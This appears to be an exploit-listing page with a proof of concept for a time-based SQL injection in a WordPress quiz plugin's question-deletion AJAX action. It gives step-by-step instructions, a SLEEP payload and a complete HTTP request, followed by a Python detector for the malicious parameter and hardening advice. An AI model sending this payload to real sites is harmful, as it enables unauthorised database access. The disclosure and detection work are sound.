## https://sploitus.com/exploit?id=WPEX-ID:E3EEE6BC-1F69-4BE1-B323-0C9B5FE7535E
1) You will need a valid nonce for the deletion of quiz questions.
2) Sign in as a Contributor and create a quiz with at least one question.
3) Edit the quiz and click the "Delete All" button to fire off the right request with a valid nonce.
4) Replace the question ID with the payload below to sleep for 5 seconds:

```
(SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a)
```

Request:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: test.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://test.site/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 118
Origin: http://test.site
Connection: keep-alive
Cookie: Contributor_Cookie

action=qsm_bulk_delete_question_from_database&question_id=(SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a)&nonce=577a29f6f1
```
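
A defensive check for the request above, as an added example that is not part of the original advisory or the plugin's code: it parses a captured admin-ajax.php POST body and flags a `question_id` that is not a plain integer list. The integer-list rule for legitimate requests and the benign sample body are assumptions.

```python
import re
from urllib.parse import parse_qs

# Action name taken from the request on this page.
ACTION = "qsm_bulk_delete_question_from_database"
# Assumption: a legitimate "Delete All" request carries one integer or a
# comma-separated list of integers in question_id.
ID_LIST = re.compile(r"\d+(?:\s*,\s*\d+)*")


def check_body(body: str) -> dict:
    """Classify one form-encoded admin-ajax.php POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    # PHP keeps the last value of a repeated key, so judge by that one.
    if fields.get("action", [""])[-1] != ACTION:
        return {"relevant": False, "suspicious": False, "reason": "other action"}
    values = fields.get("question_id", [])
    if len(values) != 1:
        return {"relevant": True, "suspicious": True,
                "reason": "question_id missing or repeated"}
    value = values[0].strip()  # parse_qs has already URL-decoded the value
    if ID_LIST.fullmatch(value):
        return {"relevant": True, "suspicious": False, "reason": "integer list"}
    return {"relevant": True, "suspicious": True,
            "reason": "question_id is not an integer list: %r" % value}


# Body from the request shown on this page.
PAGE_BODY = ("action=qsm_bulk_delete_question_from_database"
             "&question_id=(SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a)"
             "&nonce=577a29f6f1")
# Constructed sample: what a benign bulk delete is assumed to look like.
BENIGN_BODY = ("action=qsm_bulk_delete_question_from_database"
               "&question_id=12%2C13%2C14&nonce=0000000000")
# Constructed sample: unrelated admin-ajax traffic.
OTHER_BODY = "action=heartbeat&question_id=abc"

if __name__ == "__main__":
    for name, body in [("page", PAGE_BODY), ("benign", BENIGN_BODY),
                       ("other", OTHER_BODY)]:
        print(name, check_body(body))
```

The same allow-list rule (integers only) is what the server-side handler should enforce before the value reaches a query; a capability check on the AJAX action would additionally keep Contributor accounts away from it.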